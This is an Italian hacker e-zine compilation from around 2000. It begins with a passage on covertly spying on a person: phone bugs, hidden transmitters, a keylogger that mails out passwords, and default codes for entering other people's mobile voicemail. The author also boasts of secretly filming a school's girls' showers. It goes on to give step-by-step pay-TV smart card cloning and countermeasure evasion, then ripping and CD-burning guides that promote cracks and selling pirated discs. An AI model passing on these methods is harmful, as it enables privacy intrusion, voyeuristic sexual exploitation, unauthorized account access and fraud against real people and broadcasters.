direttamente ai file di una persona, non bisogna cancellare niente, neanche
se la persona è bastarda.

Potete inserire una cimice telefonica sul telefono.
Avevo i progetti per costruirne una ma gli ho persi, comunque si trova su
qualsiasi negozio di elettrotecnica, credo, comprarla viene di sicuro meglio
di quella che fate voi. La cimice telefonica è grande più o meno 1 cm di
raggio, deve essere posizionata sul microfono del telefono, in modo che
tocchi la sbaretta metallica in basso, dopo basta avere un ricevitore
e si possono sentire discorsi vari.

Volete sentire un discorso su una stanza, niente di più facile, prendete un
walkman a 500khZ, larga ricezione, tre canali, mettetelo ben nascosto (su
condotti dell'aria, ripostigli, sotto armadi o mobili, ecc..) basta
sintonizzarlo sullo stesso canale che trasmette che è una meraviglia.
Se siete un po distanti basta che sintonizziate un ampliatore di frequenza
sulla stessa banda, la frequenza viene ampliata secondo il trasmettitore.

Avete mai visto quei siti internet in cui compaiono spy cam di filmati
pre-reggistrati?

Inviare i filmati della persona su internet mi sembra eccessivo, però
divertente. Se la persona usa una cassetta e-mail (il programma allegato
logga anche questo, e spedisce anche le password di sistema) potete loggare
anche quella, sapete il nome utente e password e il gioco è fatto.

Poter inviare e-mail a nome di un altro non è una cosa da poco (nel senso
molto utile). Per vedere nomi utenti e password varie consiglio userpas.

Appogiare una telecamera ad un vetro, magari ben nascosto, è utile ed efficace.
Io lo ho fatto una volta sullo spogliatoio femminile della mia scuola, sulle
docce, funziona benissimo.
Ascoltare una segreteria di una persona è facilissimo, di solito nessuno
cambia il codice, tranne io, basta che quando dice, risponde la segreteria
telefonica.... premere * e digitare 1234* (omnitel) oppure # 1111# (tim), per
memotel il codice è # 1234#.

Una volta inseriti dentro la segreteria potete cambiare mesaggio di benvenuto,
codice d'acesso, sentire i mesaggi (?), cancellare o memorizzare i mesaggi e
così via.....

Delle segreterie wind non so il codice di acesso.
Per loggare come detto, bisogna essere anonimi, codici che tengono anonimi
tipo *67# o 1793 sul telefono fisso non sono sicuri, un metodo usato è il
trasferimento di chiamata, la linea 1 viene trasferita alla linea 2 che viene
trasferita alla linea 3 che infine chiama il numero voluto, magari con prima
1793, vengono usati questi metodi anche da agenzie varie.

ES:

1__________2__________3__________4__________destinatario

Più linee sono meglio è....
Magari se le linee passano anche per altri stati è meglio.

I codici per tenersi anonimi sono : *67# o 1793 telefono fisso, #31# omnitel
e wind,931 tim.

La polizia traccia come niente la persona che usa questi codici, la NSA con il
trasferimento non ci mette niente, solo il tempo di trovare la linea di
partenza.

Una volta ho visto su un film un metodo che usavano per spiare una persona,
secondo me ancora efficace, anche se il film è anni '50.

Avevano un furgone e lo avevano piazzato vicino a una centralina, con una
telecamera puntata verso la casa a cui era intestata la linea, reggistravano
i movimenti e anche le chiamate, ottimo.


---gouranga---


-=!!!|-sAtElLiTe hAcKinG-|!!!=-

Autore: ^Mfonzie^

Thanx to: Cyber per collaborazione, impegno e volonta'.


DISCLAIMER
Le solite dichiarazioni: Le informazioni presenti su questo articolo sono a titolo
esclusivamente informativo quindi non mi assumo nessuna responsabilità sull'uso
che ne potreste fare. Conoscere è legale, le informazioni sottostanti sono
comunque reperibili facilmente su internet. IO NON VENDO NIENTE E NON CERCO
DI ISTIGARE NESSUNO ALLA PIRATERIA. CONOSCERE E' LEGALE. RICORDATE IL VERO
PROBLEMA SONO I NEGOZIANTI ( e tutti quelli che lucrano su questo)CHE SI
STANNO ARRICCHENDO ALLE SPALLE DELLE EMITTENTI CREANDOSI UN VERO E
PROPRIO MERCATO DI SMART CARD PIRATA.
Cmq state attenti e non fate cazzate ;)


Salve ....finalmente ho trovato un po' di tempo per scrivere qualcosa per
A.I.S...spero che la gradirete.
conoscete Stream ???D+?????? e tutti i pacchetti stranieri???
E' bello vedere tutte le partite gratuitamente, i film ,la Pay per View
(senza Pay ;-) la Formula 1 su sette canali e magari anche qualche bel
canale per adulti no??? ;-) il tutto anche in dolby surround, 16:9 ecc.
Bene oggi vi spiegherò come realizzarvi la vostra bella smart card per
la TV digitale in base alle mie esperienze personali. Sicuramente ne
avrete sentito parlare in giro,forse avete dei dubbi oppure conoscete
chi nella vostra città vende schede già modificate a prezzi astronomici.
bene io vi spiegherò tutto con precisione. Vi starete chiedendo
in cosa consiste? bisogna riprogrammare la scheda ..... cosa mi serve ?

Bene prima di tutto un po' di teoria:

Interfaccia Smart Mouse / Phoenix: (Phoenix è quella che ci serve)
Si tratta del programmatore, capace di inviare i comandi alla scheda
(potete acquistarlo su internet già fatto o realizzarvelo da soli)


Un software che comandi l'interfaccia Smouse/Phoenix per scrivere ed
inviare comandi alle smart card: ne esistono molti , + o - efficaci
es CardWizard,Cardmaster, CardDevil ecc. Il software deve essere impostato
in questo modo: si deve scegliere quale porta seriale utilizzare es COM1
e il Clock (se a 3,57 Mhz o 6Mhz) . Quando è tutto ok allora si può fare
un reset alla scheda e poi inviare i vari comandi

Ecco alcuni software:

CardWizard: Sicuramente il miglior software per inviare comandi alle schede,
è velocissimo, stabile e ricco di funzionalità puoi farci di tutto.
La versione originale è in tedesco ma è possibile reperire anche la
versione tradotta in italiano.

CardMaster: Un buon software , un po' capriccioso perché per ogni minima
cosa si blocca ma se viene settato bene ed è tutto ok funziona a meraviglia
(ha qualche bug). Anche per questo sono disponibili versioni tradotte
in italiano.

CardDevil: Un buon software per Dos, molto stabile ma un po' lento, in
lingua inglese semplicissimo da configurare e da utilizzare.
..e tanti altri ancora.


Irdeto:
Standard di codifica/decodifica al momento il più diffuso e anche il più
piratato, troppo piratato :(

Serial Hex:
Il Ser Hex e' un valore importantissimo perche' e' unico composto da tre
byte e non ne troverete altri uguali questo e' stato fatto per i vari
gestori in modo da inviare informazioni ai loro abbonati senza nessun errore.

Serascii:
E' un numero di undici cifre collegato al Serhex che serve al gestore
ogni qualvolta voi dovete chiedergli qualsiasi informazione.

Provid:
In una scheda irdeto ci sono due provid ossia 00 oppure 10 ma la
maggiorparte dei gestori usa lo 00. Il provid e' composto da tre
byte che sono il numero del vostro abbonamento. Fino a circa tre mesi
fa quando uno comprava una Welcome Kit era 000300 e cambiava solamente
quando si attivava un abbonamento , adesso una volta che si
inserisce la scheda nel ricevitore gli viene attribuito un provid
automaticamente.

Date:
La data interna della smartcard serve per determinare la temporizzazione
degli eventi ovvero quando scade il vostro abbonamento.

Atr:
E' la risposta al reset inviata dal phoenix . La risposta sara' una
sequenza di 20 bytes :
3B 9F 21 0E 49 52 44 45 54 4F 20 41 43 53 20 56 31 2E 36 9F che
servono al terminale per determinare quale protocollo usare.

Channel id:
Sono sono i codici dei vari pacchetti di abbonamento e sono formati da
due bytes + due bytes che indicano la data di scadenza dell'abbonamento.

Key
Sono le chiavi di decodifica composte da 8 bytes piu' uno iniziale
per identificare la key che sono : 02 - 04 - 06 - 08 - 0a - 0c - 0e - 10
per ogni Provider. Quindi in ogni card Irdeto ci possono essere massimo 16
chiavi cioe' 8 per provider 00 e 8 per provider 10.Ogni canale per poter
essere decodificato ha bisogno della giusta chiave per metterlo in chiaro
altrimenti non si vede pur avendo inserito i chanid giusti.

Alcuni esempi :
Blustream - Key 08
Primafila - Key 02
Streamcalcio - Key 00 che non e' altro che la famosa Mkey
D+ - Cambia ormai periodicamente key dalla 02 alla 10 ciclicamente.

Quando due Bouquet usano la stessa key in contemporanea (ad esempio due key02)
abbiamo due key incompatibili e teoricamente non è possibile far condividere
queste due "cose" ma a questo punto entra in gioco il pic del blocker...
si proprio lui il famoso 16F84. E' possibile programmare il pic
utilizzando i file hex già pronti del blocker universale, mega blocker
o altro oppure generarsi con programmi tipo Megablocker Generator il
proprio hex e passando l'opportuno crd sulla scheda (Key e channel id).
In questo modo sarà possibile gestire due o piu key uguali senza problemi.

Masterkey:
Si tratta di una key grazie alla quale il processore della card
mette in chiaro i vari canali. Altra funzione della Mkey e' quella di
elaborare le Key che il gestore invia alle nostre card. La Mkey ha un
valore di 8 bytes ed e' quasi sicuramente collegata al Serial Hex ,
perche' quando viene inviata dal gestore la invia ad un Serial Hex
ben preciso (e come avevamo detto prima e' unico per ogni card).
Quasi sicuramente vi domanderete da dove si prendono tutte queste
informazioni? Dai Log visto che i gestori inviano in continuazione le
varie informazioni alle nostre card.

Pkey e Pmkey:
Quando una sc riceve una key o una Mkey questa non viene memorizzata cosi
come gli viene inviata ma viene elaborata e trasformata in chiave
decriptata ovvero Pkey o Pmkey.

Signature:
Non e' altro che un codice di controllo che viene posto alla fine di
un comando ed e' composto da cinque bytes

CRD:
I crd sono dei semplici file di testo contenenti i comandi irdeto che
devono essere inviati alla scheda


Cavo Null Modem:
Cavo seriale 15 pin (pin to pin), usato per collegare Notebook
ecc.. (quello usato dallo Smart Mouse è Maschio-Femmina)


LE SCHEDE
serviranno delle schede di stream, D+ o altro scadute o abbonamenti
minimi ..ne avete una??? Potete utilizzare una scheda scaduta, sottoscrivere
un abbonamento minimo a stream (24.000 £ al mese) o a D+ (19.000 £ al mese) ,
oppure farsi un abbonamento e disdirlo entro sette giorni, denunciare di aver
perso la scheda ecc. ecc. (il cane può sempre mangiarsela no? :-)) Comunque io
consiglio di fare un abbonamento minimo perché almeno così la cosa andrà avanti.
le varie versioni di schede le possiamo dividere sostanzialmente in due tipi:
-ACS 1.2
-ACS 1.4 e 1.6

MOSC : sono le schede originali che poi vengono modificate opportunamente ;-)

HORNET: sono le schede pirata vere e proprie, di solito vengono vendute
a prezzi molto alti e sono meno flessibili delle schede originali
(ormai oggi sono quasi inservibili) .
Personalmente sono contrario all'uso di queste schede.

La mia filosofia è questa: I prezzi degli abbonamenti è vero sono
troppo alti per vedere tutto legalmente, io consiglio di fare almeno
un abbonamento legale minimo a Stream o a D+ in modo da consentire comunque
guadagni minimi alle emittenti e poi aggiungere gli altri canali "in casa".
Così penso non ci rimetta niente nessuno perché comunque le emittenti
devono guadagnarci qualcosa altrimenti se tutti avessero schede pirata
smetterebbero di esistere.

BLOCKER : è un attrezzo reperibile facilmente in commercio con il nome
Dual Card (cioè utile a mettere due schede in contemporanea legalmente) ma
la cosa importante del blocker è un piccolo integrato (un pic 16F84 ) che
opportunamente programmato permette di filtrare i segnali di
disabilitazione in caso di ECM e che permette anche di gestire
(sempre opportunamente programmato) più key in contemporanea. È un
interfaccia che si inserisce nel decoder (simula una scheda) e che poi
accoglie la scheda vera e propria e serve appunto a preservarne il contenuto.

ECM:
è un sistema di contromisura elettronica che le emittenti adoperano per
disabilitare con impulsi particolari le schede abusive. Utilizzando
il blocker si è protetti da questo tipo di disabilitazione
(l'ultimo ECM di D+ (ecm serio intendo) risale a Marzo (anno scorso).
attualmente stiamo assistendo solo ad una serie di Switch off)

SWITCH OFF:
È un tipo di ecm ma consiste nel cambiare i codici con altri nuovi,
nel caso di schede originali non modificate il cambiamento avviene senza
che l'utente se ne accorga. Nel caso di una Mosc inserita in un blocker i
codici non verranno aggiornati perché il blocker non permetterà di farlo e
si resterà al buio ( in questo caso occorre riprogrammare la scheda con i
nuovi codici oppure bisognerà farsi un clone da una scheda regolarmente
abbonata da inserire poi senza blocker e che verrà riconosciuta come
regolarmente abbonata e aggiornata direttamente). Attualmente è in fase
di perfezionamento un blocker che fa un autoupdate delle key in automatico.

CLONE:
Farsi un clone consiste nel copiare dati tipo PlainMasterkey e
Provider id che identificano le schede regolarmente abbonate.
Questi dati devono essere inviati alla scheda da clonare che li riceverà
e verrà riconosciuta come l'originale.Ovviamente bisognerà ricordarsi di
inserire i channel id dei relativi canali. Un clone attualmente è importante
per il pacchetto D+ e per SCT.

NEGOZIANTI: razza bastarda (non tutti, almeno quelli che lucrano su questo).
Non capiscono che vendendo tutte queste schede pirata stanno contribuendo alla
morte dell'IRDETO. Intanto stanno guadagnando alle spalle delle emittenti
grosse somme di denaro. Quindi carissimi di Tele + e Stream che sicuramente
leggerete questo articolo, dovete controllare i vostri cari centri affiliati
e non vi dovete impuntare sul povero fesso di turno che magari paga
l'abbonamento minimo e si è aggiunto un po' qualche canale.


Cosa dovete fare???
Prendete la vostra interfaccia Phoenix-smartmouse e la collegate tramite
porta seriale al vostro caro PC, la settate a 3,5 Mhz senza inversione
(come Phoenix) . Aprite uno software ad es. il Cardwizard lo impostate sulla
com dove è collegata l'interfaccia e settate il tutto a 3,5 Mhz poi. inviate
gli opportuni crd contenenti le varie Plainkey , Channel ID ecc.
(eventualmente se dovete metterci su un clone o se dovete cambiare dati
importanti della scheda tipo SerialHEX , Nazionalità , PMK ecc.).
Nel caso si vogliano gestire Multibouquet ( cioè più bouquet anche con
la stessa key di utilizzo) bisognerà programmare anche il pic del blocker
e questo potrà essere facilmente fatto con il megablocker generator che
attualmente è alla versione 3.5 dopo aver impostato i singoli bouquet,
la relativa key e gli 8 byte di essa e dopo aver trovato tutte le
singole signature bisognerà generarsi l'hex da inserire sul pic.Se
tutte le operazioni sopra elencate saranno eseguite correttamente
allora si decodificherà tutto correttamente altrimenti avrete saltato
qualche punto che dovrete riprendere.
IMPORTANTE impostare un delay di circa 50 ms e la velocità a 3,5 Mhz
e controllare che le signature vengano calcolate tutte ( vedere la risposta)
perché se procede troppo velocemente possono verificarsi errori....
controllate le signature.

PRESTO COMUNQUE VI DARO' L'URL DEL SITO INTERNET CONTENENTE TUTI
I CRD BELLI E PRONTI CON I RELATIVI COMMENTI.INOLTRE I SOFTWARE,
LE INTERFACCE e tutto il necessario per il sathacking.

Questo articolo è stato rivisto poco tempo fa a causa dei
continui switch off di D+ e molte parti di esso sono state modificate
e molte altre cancellate , soprattutto la parte relativa ai multibouquet
(che avevo spiegato approfonditamente). Comunque a causa del poco tempo
a disposizione non ho potuto trattare altri argomenti che saranno
affrontati nel prossimo articolo che conterrà:
DVB 2000, l'arte di Loggare, metodi per recuperare card azzerate,
metodi di personalizzazione, clone in generale, algoritmi vari,
spiegazioni crd ecc. ecc ma soprattutto l'apertura del SECA.

..LA TV LIBERA E' UN DIRITTO DI TUTTI. ;)

p.s. scusate gli eventuali errori accidentali e non..cmq non ho
avuto molto tempo per rileggere.

Byez

---^Mfonzie^---

-=!!!|-mp3 tUt0riAl-|!!!=-

Autore: mR_bIs0n

------------------------------------------
Mini - Guida all'uso "illegale" degli MP3
by mR_bIs0n
------------------------------------------

Consumo: ankora devo mangi… quindi...
Musica ascoltata: Hit Mania Dance 2000 direttamente in mp3...
Saluti: al mio amikone Panino (immancabile), Daniele, Luigi, Marco, Bib,
Claudio nonkŠ tutti gli amici del kanale #Phreak.it
Dedikato: a Spastik Woman (anke konosciuta kome Red Hair - Ilaria), ke dopo
tante peripezie ha lasciato il suo bravo ragazzo (Spastik Man)...
Fankulo: non alla prof. ke mi ha messo 8 in Storia, kosa mai successa...
bens alla conosciutissima L.I.S.A. (ehehhe troppo forte Tanados...)

Bene s'inkomincia...
Innanzitutto vi diko ke leggere e fare ci• ke c'Š scritto qui non Š punibile
dalla legge!!! HEHEHE proprio kos... quindi non mi dilungo in nessun
disclaimer legale ke mi stanno sempre sulle palle...
Allora... questa modesta mini guida all'uso degli mp3, Š stata concepita dopo
varie diskussioni kon i miei amici del paese... vi riporto sotto una di
queste...

Amiko Demente - Komu faci ku ti sienti li canzoni allu compiutere???
Trad.- Oh, gentil messere, kome potrei fare io, di grazia, ad
ascoltare dei soavi stornelli attraverso il computer da me
posseduto???
Io - Devi trasformarti le traccie CD in file MP3 ke potrai
askoltare sul tuo PC...
Amiko Demente - C'Š kazzu shta dici qustu???
Trad.- Oh, amici miei, cosa dice questo gentiluomo... quali
scelleratezze emette il suo cavo orale???

Bene, avete kapito tutti ke qualke novizio potrebbe essere completamente
profano riguardo gli mp3... quindi ho scritto quest'art per ki ne sa'poko o
completamente niente...

Oki

Mettiamo ke avete un CD niente male ke vi ha prestato il vostro sporko
amiko... sporko perkŠ lo rivuole il giorno dopo... ke bastardo... dovrebbe
morire... certo ke la gente Š proprio stronza... inxomma... lo rivuole...
ke bastardo... dovrebbe morire... certo ke la gente Š proprio stronza...
mo'basta! Voi da perfetti approfittatori potreste, e diko, potreste
trasformarvi tutto o in parte il CD in mp3... potreste, perkŠ, c'Š ne sono di
scemi in giro... quindi dovrete avere innanzitutto tre cose
IMPORTANTISSIME!!! Ke sono un computer, una skeda sonora e per ultimo, e non
in ordine di importanza, delle kasse stereofonike!!!
Poi anke del software... naturalmente...

Oki, innanzitutto sentite bene quali tracce volete trasformarvi... una volta
fatto ci• dovete prokurarvi del software...
Ma prima vi spiego kosa fanno...

**************
* Traccia CD *
**************
||
\/
Trasformazione
in WAV
||
\/
**************
* File WAV *
**************
||
\/
Trasformazione
in MP3
||
\/
**************
* File MP3 *
**************

uff... c'ho messo pi— tempo a fare sto skema ke ha scrivere il testo... spero
ke valga... vabbŠ...

Allora, ci sono dei software ke fanno ci• ke ho deskritto... lo fanno tutto in
una volta... cioŠ scegli la traccia, setti le caratteristike e ti f…
direttamente il file MP3... questi prog sono comodi ma per la maggiorparte,
complicati e sopprattutto A PAGAMENTO... cioŠ ti rompono le palle
trasformando solo alkune traccie a RANDOM... ke palle... ke stronzi... certo
ke dovrebbero sopprimerli quelli ke fanno kos... bastardi... cmq...
alkuni di questi prog sono per fare un esempio AUDIOGRABBER... ke stronzi...

Io per venire in kontro a questi bastardi di programmatori uso due programmi
diversi: uno mi fa la traccia CD in WAV e poi un altro mi fa il WAV in MP3...
Bravi i programmatori... il software Š freeware o shareware... ke bello!!!
Vi diko subito quali uso e dove potete reperirli!!!
Per trasfomrare le Traccie CD in WAV uso Digital Audio Copy ver. 1.50
(WinDAC32)... Š share ma tanto non rompe le PALLE!!!! Prendetelo al sito
www.windac.de con un po'di fatika e di ricerka potete trovare il serial o il
crack...
Mentre per trasformare il WAV in MP3 uso un prog codificatore: BladeEnc
e' un encoder freeware nato per Linux e basato sulle routines di
compressione mpegEnc. Potrete trovarlo al sito http://bladeenc.mp3.no/.
In kaso visitate la sezione SoftWare di Vitaminic (www.vitaminic.it/software)
ci sono molti software interessanti...

Continuando, vi posso dire ke questi software sono affidabilissimi e semplici!
Quindi, mettiamo nel lettore il nostro CD (il lettore sarebbe quella specie di
portatazza da ufficio ke forniscono col PC...), dopodikkŠ, facciamo partire
il prog WinDAC32 e settiamo tutti i parametri tipo dove scarikare il file...
poi una volta fatto ci• scegliamo la traccia... buona scelta, la famosissima
canzone: Papa Giovanni Paolo II - Ave Maria ... scommetto ke avete avuto il CD
con la videocassetta "La vita di Papa Woutivla"... non vi sparo perkŠ non vi
konosko...

skusatemi tanto ma ora devo studiare biologia e farmi tanti altri compiti...
ke palle stratosferike... quindi arrivederci fra 5 min... seeeeeeee almeno
un paio di ore... diciamo pure tra 3... ma tanto voi ke kaxxo ve ne
fregate... booooo

Sono tornato e possiamo ricominciare... avete persino sentito la mia mancanza?

Oki, avete scelto la vo

  
stra traccia, ora tramite il men— del prog
grabbatela... kosikkŠ si former… il file
"Papa Giovanni Paolo II - Ave Maria.wav" ke potrete ora trasformare in MP3...
uau direte voi vero???
Š proprio mitiko ascoltarsi a gran volume con il vostro lettore portatile MP3
Papa Giovanni Paolo II - Ave Maria.MP3... soprattutto se usate anke un
rosario...

Fatto ci• (intendo grabbato la traccia...), prendete il prog FREEWARE
BladeEnc... e avviatelo... usciranno un sacco di puttanate...
ma a noi serve una sola riga di komando

bladeenc Papa Giovanni Paolo II - Ave Maria.wav

se volete potrete settare il bitrate (ke sarebbe la qualit… sonora) pi— alto
o pi— basso di 128 ke Š gi… di default. Kome?

bladeenc -160 Papa Giovanni Paolo II - Ave Maria.wav
bladeenc -56 Papa Giovanni Paolo II - Ave Maria.wav
bladeenc -64 Papa Giovanni Paolo II - Ave Maria.wav

Bene ora il vostro proghetto, inizier… il coding del file... ke palle...
durer… un pokettino... uau Š finito!!! Ora avete il vostro beneamato MP3...
...
...
...
...
MbhŠ ke volete?
...
...
...
E'finito! Cirkolare...
...
...
...
Madonna mia... vabbŠ me'...
Kontenti??? Razza di...
CIAO A TUTTI DA

---mR_bIs0n---


##############################
#+------------++------------+#
#| cD-wRiTinG || cD-wRiTinG |#
#+------------++------------+#
##############################


-=!!!|-iNtr0 alLa mAsTerIzZaZi0nE-|!!!=-

AUTORE : AsAx

Questo file sarà molto molto ma che dico... molto utile a chi si appresta ad
entrare nel mondo della masterizzazione  e della pirateria di software.
Naturalmente vendere i cd mafagna agli amichetti di skuola o ai prof. e' un
reato... ma il bello e' proprio quello... ;-)

--->>> mah, mi sa che sto dicendo già kazzate... cmq...<<<---


*Tempo impiegato a scrivere:
--come kazzo faccio a saperlo se sto iniziando ora? bah...

*Alimenti consumati:
--anche se sono le tre di notte, mi è venuta una certa fame... scendo di
--sotto [[ in silenzio ]] a prendere qualcosa... scivolo su un kazzo di
--paletto che non so chi abbia messo lì sulle scale...I miei si svegliano
--pensando che siano i ladri...rischio una randellata sulla testa da parte
--di mio padre trasformatosi in Van Damme...mi è passata la fame,
--ricominciamo a scrivere...

*Musica ascoltata (a basso volume):
--Down Low -So long goodbye-

*Note varie:
--c'e' il kane del vicino che ulula porKo D..! (No, cosa avete kapito, mica
--il kane ulula "porko D..", sono io che ho dimenticato la virgola... )
--Un giorno di questi mettero' a frutto le nozioni tecniche sugli esplosivi
--che ho appreso...

Dette ste' cose cominciamo...

Cos'e' la pirateria e cosa comporta? ( in parole povere...)

Sembra una domanda cui solo un mentecatto non troverebbe risposta cmq io lo
spiego in semplici parole... La pirateria consiste nel trafficare con
software (oppure con cd musicali) copiati senza disporre dell'effettiva
autorizzazione da parte di chi ne possiede i diritti. Questo naturalmente e'
un bel kazzo perchè si ricade nell'illegalita' (ma vaaaaa... e senno' perche'
lo facciamo :-)) poi ai finanzieri i pirati stanno proprio sul pasticciotto
e se ci sgamano ci fanno un culo quanto una casa... pensate che leggevo
diverso tempo fa su un quotidiano di alcuni sbirri che, dopo numerosi
appostamenti,  credevano di aver finalmente bekkato uno spacciatore di coca:
infatti, a casa del tipo c'era un viavai continuo di gente. Dopo aver fatto
irruzione (fottuti bastardi!!!) hanno trovato una bella sorpresa: una
"fabbrica" di cd mafagnati... Percio' evitate di esporvi troppo nei vostri
traffici... meditate, meditate...


<---->Componenti hardware -necessari<---->

C'e' una grossa distinzione da fare per quanto riguarda l'hardware: infatti
tutto dipende dalle vostre taske: se avete un pò di money da spendere andate
tranquilli e comprate tutto scsi, altrimenti accattatevi l'eide anke se e'
un cesso (beh, non proprio, pero'....gli manca la katena)
NON VENITE A KIEDERMI LA DIFFERENZA TRA SCSI E EIDE, IMMAGINO CHE QUELLA LA
SAPPIATE... mi sbaglio? mmm, puo' essere... ;-)

Vediamo qualche prezzo [indicativo naturalmente]

§§§ SCSI §§§

-Masterizzatore TEAC CD-R56S 6x24x SCSI Lit. 440.000
-Lettore PLEXTOR 40X ULTRAPLEX SCSI Lit. 203.000 ---->>> TOT.- 768.000 -
-Controller ADAPTEC 2904 PCI Lit. 125.000

§§§ EIDE §§§

-Masterizzatore MITSUMI CR4804TE 4x4x24x EIDE Lit. 420.000 -->>> TOT. 420.000
Tanto il lettore gia' l'avete ( se non e' obsoleto ), il controller non vi
serve a un Kazzo....

~~~La differenza di prezzo c'e'... quindi comprate quello che potete.

Per quanto riguarda i cd vergini [kome mi piace sta' parola...] i prezzi
vanno dalle 1.600 lire alle 3.000 lire. Comprate quello che volete purche'
siano di qualità buona. Attenzione perchè con l' eide, a differenza dello
scsi, se kannate i cd molto spesso e' a causa del supporto che fa schifo,
perciò cambiate marca; inoltre alcuni cd bulk non sono supportati da tutti
gli eide (e questo e' grave in quanto sono i meno costosi...). Insomma, se l'
eide lo pagate di meno un motivo c'e', soprattutto in termini di velocita'..


<-->Prepariamoci a masterizzare il nostro 1* CD<-->

Allora, ci siamo comprati sto kristo di masterizzatore, lo abbiamo montato e
non sappiamo che kazzo farcene... mmm, beh, mi sembra giusto...
Abbiamo un programma per masterizzare? Sicuramente si', se il mast lo abbiamo
comprato nuovo; sicuramente no, se il mast lo abbiamo rubato... in questo
caso mandatemi una mail che vi faccio una copia io... ;-)
Scherzi a parte se il programma non l'avete TROVATELO!!!!!!!!!!!
Ecco, visto, e' cosi' facile... bene bene, installiamo il programma sul
nostro winKazz (o no?) poniamo che sia "NERO BURNING ROM 4.06.1". Benissimo,
questo prog e' dotato dell'utilissimo cd-wizard che permette anche ai
cerebrolesi di fare il loro cd. IO LO ODIO!!!
KE KAZZO ME NE FREGA A ME DEL CD CON GLI OCCHI CHE SUONA LA KITARRA, CHE
TIENE LE KARTELLE... IO VORREI FIKKARGLIELE IN KULO LE KARTELLE, LA KITARRA,
GLI OCCHI...
basta, mi sono sfogato... dicevamo... ah, si dell'utilissimo cd-wizard:
usandolo potrete scegliere facilmente il tipo di cd da scrivere, specificando
l'origine dei dati e kazzi vari...io vi konsiglio di non usarlo...

La cosa piu' importante che voglio dirvi è di non fare MAI copie al volo;
infatti, e' il metodo piu' rischioso per sprecare i nostri amati cd vuoti
anche se il piu' veloce. Mi raccomando...
altrimenti non guadagnerete mai un soldo se i profitti che  ricavate con la
vendita dei cd li sprecate tutti a KAZZO...

<--->Alcune regole generali per una corretta masterizzazione<--->

-- DISABILITATE SCREENSAVER E ANTIVIRUS DURANTE LA FASE DI COPIA
-- NON USATE IL COMPUTER PER NESSUN MOTIVO DURANTE LA COPIA
-- EFFETTUATE, SE NE AVETE TEMPO, LA PROVA DI SCRITTURA: consiste nel
-- simulare, e ripeto, "simulare",  una vera scrittura su cd. In  questo
-- modo, se avete dei dubbi sulla riuscita del cd, usatela...
-- NON FATE AVVICINARE I CUGINETTI ROMPIKOGLIONI CHE PER PURO CASO PREMERANNO
-- IL TASTO "ANNULLA" QUANDO SIETE AL 97% DELLA FASE DI SCRITTURA

<-->DETTO QUESTO RICAVIAMO LA REGOLA FONDAMENTALE DELLA MASTERIZZAZIONE<-->

-- MEGLIO METTERE PIU' TEMPO E GUADAGNARE DI PIU' CHE METTERE DI MENO E
-- GUADAGNARE DI MENO-- mado'... sono un grande [k@ç|i@ne],

Come ho fatto a skoprirlo?e cmq il tempo impiegato e' sempre relativamente
breve: 6min per fare l'immagine, 8 per scriverla...mmm, siamo andati bene ;-)
che stronzata...

Scriviamo [in maniera sikura] il nostro CD


Tutto cio' vale, naturalmente, sia per i cd dati che audio.

1- Uscite dal cd-wizard <SOLO PER NERO 4.06.1>
2- Andate nella voce "copia CD"
3- Nella scheda "IMMAGINE" specificate il nome del file (se vi interessa...)
4- Nella scheda "OPZIONI DI COPIA" disabilitate "al volo" e scegliete la
posizione del cd che intendete copiare (se  lettore o masterizzatore) e la
sua velocita' di lettura. Ricordate che piu' bassa e' la velocita' --->
meno errori potreste incontrare
5- Nella scheda "OPZIONI DI LETTURA" disabilitate l'opzione "leggi numero
catalogo del supporto e ISRC"
6- Nella scheda "SCRIVI" decidete se volete fare o no il test di scrittura, e
specifikate a quante velocità scrivere il cd.
7- premete su "scrivi" e il gioko e' fatto !!!

****************************************
!!ATTENZIONE!! §§§§§§§§§§ !!ATTENZIONE!!
****************************************

Questa mini-guida e' indirizzata a ki e' alle prime armi con la
masterizzazione percio' ho volutamente:

- Parlato solo del NERO, e tralasciato le sue funzioni piu' importanti e piu'
"professionali".
- Fatto a meno di menzionare altri, e piu' "difficili" [anke se migliori ]
prog di masterizzazione.
->Spero di avere l'opportunità in futuro di proseguire con il mio "lavoro":
quindi cerchero' di trattare tutti i programmi che conosko,  tutti gli
argomenti piu' ostici per chi masterizza, come i cd-protetti, ( e quindi
anke kome proteggerli :) ), i cd per la play e cose varie.


Bene, mi sembra di aver skritto tutto e anche se non l'ho fatto mi sono rotto
i koglioni... aaawwwwwaawa... ho sonno...
Prima di andare a dormire, però, non posso fare a meno di salutare
-rigorosamente in ordine sparso-
Cubix il kasinista :), Pikkio il conquistatore, ddd3d il pazzo, Stefax il
vekkio :), Paolo lo skoppiato e la grande e inimitabile Lara Kraft, Fabio lo
sbirro, il mio grandissimo compagno di banco! Ciao belli !!!

Tutti gli altri speriamo ke li bekki la finanza!
skerzo... oppure no?mah...

Naturalmente skrivetemi tutto quel kazzo ke volete: kritike, precisazioni,
KONSIGLI ;-) kastimatemi i morti ma skrivetemi!!!

-->asax2k@yahoo.com<--

---AsAx---

-=!!!|-0vErBuRnInG, c0piA CD pR0tETti, c0pIa CD PeR PsX-|!!!=-

Autore: AsAx

<--->INTRO<--->

Sikuramente ora tutti konosciamo il famoso programma "Nero" della "Ahead
software"; infatti fino a un bel po' di tempo fa il programma era skonosciuto
ai piu' (quando era ankora agli esordi) e veniva utilizzato solo da poke
persone. Adesso, invece, il diskorso e' kambiato perke' il prog viene
distribuito insieme all' 80% dei masterizzatori e quindi e' utilizzato da
tutti, kani e porci ;). Percio', ritengo utile skrivere questo artikoletto ke
spero si rivelera' molto utile a ki masterizza. Prendero' in esame la versione
4.06.1 xke' mi sembra la piu' diffusa, kmq le differenze kon le precedenti
sono minime.
Vi konsiglio una buona dose di pazienza per leggere le mie kazzate, una
skrivania piena di ciokkolatini e karamelline [per addolcirvi il kuore quando
mi skriverete una mail dandomi del koglione inkompetente] e un buon
sottofondo musikale
Detto questo, possiamo kominciare...

+--------------------+
|--1---OVERBURNING---|
+--------------------+

In genere ogni cd vergine puo' kontenere da 660 a 690 Mb di dati, anke se lo
spazio totale FISIKO a noi disponibile e' di circa 650-659 Mb. Questo avviene
xke' lo spazio restante e' riservato all'area del LeadOut: diminuendo quest
area possiamo ottenere dello spazio extra per i nostri dati, ed e' proprio
kosi' ke funziona l'overmastering.
Ora vi spiego in dettaglio: in modalita' Disk-At-Once il prog invia al
masterizzatore un TOC contenente tutte le informazioni per l'area di LeadIn
(dimensioni traccia e kazzi vari…); il nostro masterizzatore [ ke in
precedenza aveva verifikato la capacita' di skrittura "sikura" del cd vergine]
kapisce ke si tratta di una dimensione superiore a quella disponibile.
